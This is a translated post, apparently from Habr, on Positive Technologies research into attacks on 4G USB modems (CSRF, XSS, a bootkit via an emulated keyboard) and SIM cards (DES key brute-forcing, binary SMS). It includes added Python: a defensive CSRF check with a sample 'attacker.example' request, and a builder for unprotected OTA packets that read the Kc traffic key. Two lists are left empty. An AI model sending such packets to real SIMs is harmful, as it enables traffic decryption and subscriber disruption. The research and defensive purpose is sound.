
4G Security: Capturing a USB Modem and SIM Card via SMS

image

Telecom operators actively promote fast and cheap 4G communications, but few people know how well it is protected. While researching the security of 4G communications, Positive Technologies experts found vulnerabilities in USB modems that allow an attacker to take control of the computer the modem is plugged into, as well as of the subscriber's account on the mobile operator's portal. In addition, attacks on the SIM card using binary SMS make it possible to intercept and decrypt subscriber traffic, or simply to block a given SIM card.

Reports on the results of the study were presented in November at the ZeroNights conference in Moscow (Kirill Nesterov, Alexey Osipov, Timur Yunusov) and at the PacSec conference in Tokyo (Sergey Gordeychik, Alexander Zaitsev). In this post we summarize the main ideas of the research, in which Dmitry Sklyarov, Gleb Gritsai, Dmitry Kurbatov, Sergey Puzankov and Pavel Novikov also took part.
A few words about the purpose of this work. This is not only about the security of the fashionable smartphones we use to follow our friends on social networks. GSM digital mobile communications are now used in many critical infrastructures, including industrial control systems (SCADA). Another everyday example that nobody would want to run into is the theft of money from bank accounts: many people have probably noticed the small antennas on ATMs, and that is GSM too:

image

A modern wireless modem is a computer with a well-known operating system (usually Linux or Android) and a set of special applications with fairly broad capabilities. This software and its data transfer protocols contain vulnerabilities that have already been exploited in recent years, for example to unlock a modem and untie it from a particular operator. One countermeasure against such hacks was to move many services to the web, but this only opened up new avenues of attack.

For our study we took six different lines of USB modems with 30 different firmware versions. Looking ahead: only three of those firmware versions could not be cracked.

What did we do with the rest? To begin with, we identify the hardware. Documentation and search engines help here. In some cases Google helps even more: you can immediately find the password for telnet access:

image

However, for external communication we need HTTP rather than telnet. We connect the modem to the computer and study it as a separate network node running web applications. We find ways to attack it through the browser (CSRF, XSS, RCE), and in this way we make the modem disclose various useful data about itself:

image

image
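The reason CSRF works so well against a USB modem is that its web interface sits at a LAN address, so the owner's browser will send a request to it from any page the owner happens to have open, cookies included. The following is an added example (not code from the post or from any modem vendor) of the server-side check such a web UI is missing: it classifies a state-changing request as same-origin or cross-site from the Sec-Fetch-Site, Origin and Referer headers, and fails closed when none of them is present. The modem address 192.168.8.1 and the three sample requests are constructed for illustration.

```python
"""Origin check for a state-changing request to an embedded web UI.

Added example, not the post's code. The modem address and the sample
requests are assumptions; real modems use various addresses and paths.
"""
from urllib.parse import urlsplit

MODEM_ORIGIN = "http://192.168.8.1"        # assumed LAN address of the modem's web UI
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}  # must stay free of side effects for this to hold


def _origin_of(url: str) -> str:
    """scheme://host[:port] of a URL, lower-cased; empty string if unusable."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return ""
    return f"{parts.scheme}://{parts.netloc}".lower()


def is_cross_site(method: str, headers: dict, own_origin: str = MODEM_ORIGIN) -> bool:
    """True if a state-changing request must be rejected as not coming from our own pages.

    Order of evidence: Sec-Fetch-Site (modern browsers, cannot be set by page
    script), then Origin (sent on POST), then the Referer's origin. A write
    request carrying no provenance at all is rejected rather than trusted.
    """
    if method.upper() in SAFE_METHODS:
        return False
    h = {k.lower(): v for k, v in headers.items()}
    sfs = h.get("sec-fetch-site")
    if sfs in ("same-origin", "none"):      # "none" = typed URL or bookmark
        return False
    if sfs in ("cross-site", "same-site"):  # an IP address has no registrable "site" to share
        return True
    origin = h.get("origin") or _origin_of(h.get("referer", ""))
    if not origin:
        return True                          # no Origin, no Referer: fail closed for writes
    return origin != own_origin.lower()      # also rejects the literal Origin "null"


# Constructed requests, as a browser would send them to the modem (the
# session cookie is attached in all three cases, which is the whole problem).
LEGIT = ("POST", {"Host": "192.168.8.1", "Origin": "http://192.168.8.1",
                  "Referer": "http://192.168.8.1/settings.html",
                  "Sec-Fetch-Site": "same-origin", "Cookie": "session=abc"})
# Hidden auto-submitting form on a page the victim opened while the modem was plugged in.
CSRF = ("POST", {"Host": "192.168.8.1", "Origin": "http://attacker.example",
                 "Referer": "http://attacker.example/page.html",
                 "Sec-Fetch-Site": "cross-site", "Cookie": "session=abc"})
# Old browser or a proxy that strips headers: no provenance at all.
BLIND = ("POST", {"Host": "192.168.8.1", "Cookie": "session=abc"})


def demo() -> dict:
    """Classify the three constructed requests; only the legitimate one passes."""
    return {name: is_cross_site(m, h)
            for name, (m, h) in {"legit": LEGIT, "csrf": CSRF, "blind": BLIND}.items()}


if __name__ == "__main__":
    for name, rejected in demo().items():
        print(f"{name}: {'reject' if rejected else 'accept'}")
```

The check is deliberately independent of the modem's IP being "private": a private address is reachable from every tab the owner has open, so it provides no isolation at all. A per-session anti-CSRF token in each form is the usual complement to this header check.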

Beyond disclosing data about the attacked modem, an attacker can:


The attack can be developed further to reach the computer the USB modem is connected to. One variant: a USB keyboard driver is installed on the captured modem, after which the computer sees the modem as an input device. From this "imaginary keyboard" the computer is sent a command to reboot from an external drive, whose role is played by the same modem. A bootkit can thus be installed on the "parent" computer, allowing it to be controlled remotely. You can see how it works in the video:



The best thing a user can do to protect against such attacks is not to plug anything into their USB ports, bearing in mind that "anything" includes USB modems, which from the outside look like small, harmless communication devices.

The second part of our research concerned SIM cards. That a SIM card is itself a computer with its own OS, file system and multifunctional applications has already been demonstrated by many other researchers. In May of this year, at the Positive Hack Days conference, cryptography researcher Karsten Nohl showed that SIM applications (addressed by TARs, Toolkit Application References) are protected to very different degrees. Some can be hacked by brute-forcing DES keys, while others respond to external commands without any protection at all, and tell a lot about themselves.

To brute-force the keys in our study we used a set of field-programmable gate arrays (FPGAs), which came into fashion a couple of years ago for mining Bitcoin and became much cheaper once that pastime lost its popularity. Our rig of eight ZTEX 1.15y boards, costing about 2,000 euros, runs at 245,760 Mcrypt/s (roughly 2.5 x 10^11 DES operations per second), which is enough to recover a DES key in about 3 days: the full 56-bit keyspace of 2^56 (about 7.2 x 10^16 keys) divided by that rate is roughly 2.9 x 10^5 seconds, i.e. 3.4 days in the worst case and half that on average.

image

image

After that we can send commands to the known TARs and manage them. In particular, the Card Manager TAR lets us load our own Java applet onto the SIM card.

Another interesting TAR is the file system, where the TMSI (the subscriber's temporary identifier in the mobile network) and Kc (the traffic encryption key) are stored. Binary SMS give us access to both:


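To make the "binary SMS" concrete, here is an added example (not code from the post or from the researchers) that builds and parses the GSM 03.48 / ETSI TS 102 225 command packet such an SMS carries, addressed either to the Card Manager TAR or to the file-system (RFM) TAR, and decodes the two files mentioned above, EF_Kc and EF_LOCI, from constructed sample contents. The byte layouts follow GSM 03.48 / TS 102 225 (command packet) and GSM 11.11 (EF_Kc, EF_LOCI); the TAR values, the RFM payload layout (plain concatenated C-APDUs) and the sample file contents are assumptions labelled in the code. The packet built with SPI 00 00 is the "no protection at all" case; for a TAR that demands a DES cryptographic checksum, the CC field must be computed with the KID key, which is what the FPGA rig in the preceding paragraph exists to recover, and is not computed here.

```python
"""Binary SMS to a SIM: GSM 03.48 / TS 102 225 command packet, plus decoders
for EF_Kc and EF_LOCI. Added example, not the post's code; see assumptions below."""
import struct

# Toolkit Application References (3 bytes). Commonly documented defaults; an
# issuer may assign others, so treat these values as assumptions.
TAR_CARD_MANAGER = bytes.fromhex("000000")  # GlobalPlatform Issuer Security Domain (applet loading)
TAR_RFM_GSM = bytes.fromhex("B00000")       # Remote File Management, GSM file system

# SPI byte 1: b1b2 = RC/CC/DS (00 none, 01 RC, 10 CC, 11 DS), b3 = ciphering, b4b5 = counter mode.
SPI_NO_PROTECTION = bytes.fromhex("0000")   # nothing checked: the "no protection at all" case
SPI_DES_CC = bytes.fromhex("0200")          # a cryptographic checksum (DES MAC) is required


def build_command_packet(tar: bytes, secured_data: bytes, spi: bytes = SPI_NO_PROTECTION,
                         kic: int = 0x00, kid: int = 0x00, counter: int = 0, cc: bytes = b"") -> bytes:
    """CPL | CHL | SPI | KIc | KID | TAR | CNTR(5) | PCNTR | RC/CC/DS | secured data.
    CPL counts everything after itself, CHL counts SPI through RC/CC/DS.
    Transport (not built here): SMS-PP with TP-PID 0x7F, TP-DCS 0xF6, UDH IEI 0x70."""
    if len(tar) != 3 or len(spi) != 2:
        raise ValueError("TAR is 3 bytes, SPI is 2 bytes")
    pcntr = b"\x00"                          # no ciphering, so no padding bytes
    header = spi + bytes([kic, kid]) + tar + counter.to_bytes(5, "big") + pcntr + cc
    body = bytes([len(header)]) + header + secured_data
    return struct.pack(">H", len(body)) + body


def parse_command_packet(pkt: bytes) -> dict:
    """Inverse of build_command_packet; the SPI bits tell us what the card will verify."""
    cpl, chl = struct.unpack(">HB", pkt[:3])
    if cpl != len(pkt) - 2 or chl < 13:
        raise ValueError("bad CPL/CHL")
    hdr = pkt[3:3 + chl]
    spi = hdr[0:2]
    return {
        "spi": spi.hex(),
        "checksum_required": (spi[0] & 0x03) != 0,
        "ciphered": bool(spi[0] & 0x04),
        "kic": hdr[2], "kid": hdr[3],
        "tar": hdr[4:7].hex(),
        "counter": int.from_bytes(hdr[7:12], "big"),
        "cc": hdr[13:].hex(),                # empty when the SPI asks for no checksum
        "secured_data": pkt[3 + chl:],
    }


def rfm_read_binary_script(path: list, length: int) -> bytes:
    """Secured data for the RFM TAR: SELECT each file ID along the path, then READ BINARY.
    Assumption: C-APDUs (CLA INS P1 P2 P3 [data]) are simply concatenated (compact format)."""
    apdus = [bytes([0xA0, 0xA4, 0x00, 0x00, 0x02]) + fid.to_bytes(2, "big") for fid in path]
    apdus.append(bytes([0xA0, 0xB0, 0x00, 0x00, length]))
    return b"".join(apdus)


def decode_ef_kc(data: bytes) -> dict:
    """EF_Kc (7F20/6F20, GSM 11.11): 8-byte ciphering key + key sequence number."""
    if len(data) != 9:
        raise ValueError("EF_Kc is 9 bytes")
    return {"kc": data[:8].hex(), "cksn": data[8] & 0x07}


def decode_ef_loci(data: bytes) -> dict:
    """EF_LOCI (7F20/6F7E): TMSI(4) | LAI(5) | TMSI TIME(1) | location update status(1).
    LAI is BCD with swapped nibbles; MNC digit 3 is 0xF for two-digit MNCs."""
    if len(data) != 11:
        raise ValueError("EF_LOCI is 11 bytes")
    lai = data[4:9]
    mcc = f"{lai[0] & 0xF}{lai[0] >> 4}{lai[1] & 0xF}"
    mnc = f"{lai[2] & 0xF}{lai[2] >> 4}" + ("" if (lai[1] >> 4) == 0xF else str(lai[1] >> 4))
    return {"tmsi": data[0:4].hex(), "mcc": mcc, "mnc": mnc,
            "lac": int.from_bytes(lai[3:5], "big"), "lu_status": data[10] & 0x07}


def demo():
    """Unprotected packet asking the RFM TAR for EF_Kc, and the decoded (constructed) files."""
    pkt = build_command_packet(TAR_RFM_GSM, rfm_read_binary_script([0x7F20, 0x6F20], 9))
    parsed = parse_command_packet(pkt)
    kc = decode_ef_kc(bytes.fromhex("001122334455667701"))          # constructed sample
    loci = decode_ef_loci(bytes.fromhex("1A2B3C4D52F01012340000"))  # constructed: MCC 250, MNC 01
    return parsed, kc, loci


if __name__ == "__main__":
    for item in demo():
        print(item)
```

The interesting field for a defender is the SPI: a card that honours packets with SPI 00 00 on the RFM TAR will answer a READ BINARY of EF_Kc for anyone who can send it an SMS, while a card that insists on a CC forces the attacker back to the key-recovery step.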
In conclusion, some simple statistics. More than one hundred SIM cards from various operators were used in this study. Around 20% of them, that is, every fifth SIM, are affected by the described vulnerabilities.

At the same time, it is hardly possible to give any protection tips to end users: the attacks take place at a fairly low technical level, so SIM card manufacturers and operators must solve the security issues here. The Western IT press, by the way, is already describing this research in the news as "the possibility of hacking millions of SIM cards and USB modems".

PS This was not the only study by Positive Technologies experts presented at ZeroNights'14. At the same conference, Artyom Shishkin and Mark Yermolov talked about techniques for bypassing Windows PatchGuard on Windows 8; some details of that study can be found here, and more will be presented in one of our next posts.

Source: https://habr.com/ru/post/243697/
